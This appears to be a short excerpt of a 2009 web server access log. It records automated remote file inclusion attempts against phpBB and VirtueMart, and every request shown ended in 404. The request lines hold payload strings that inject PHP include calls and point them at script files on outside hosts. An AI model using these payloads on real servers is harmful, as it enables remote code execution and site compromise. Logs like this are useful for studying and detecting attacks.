211.236.242.164 - - [13/Jul/2009:00:47:12 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.227.167.138 - - [13/Jul/2009:00:47:15 -0400] "GET /logs/access_log.Q109070400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
212.227.167.138 - - [13/Jul/2009:00:47:15 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
212.227.167.138 - - [13/Jul/2009:00:47:15 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
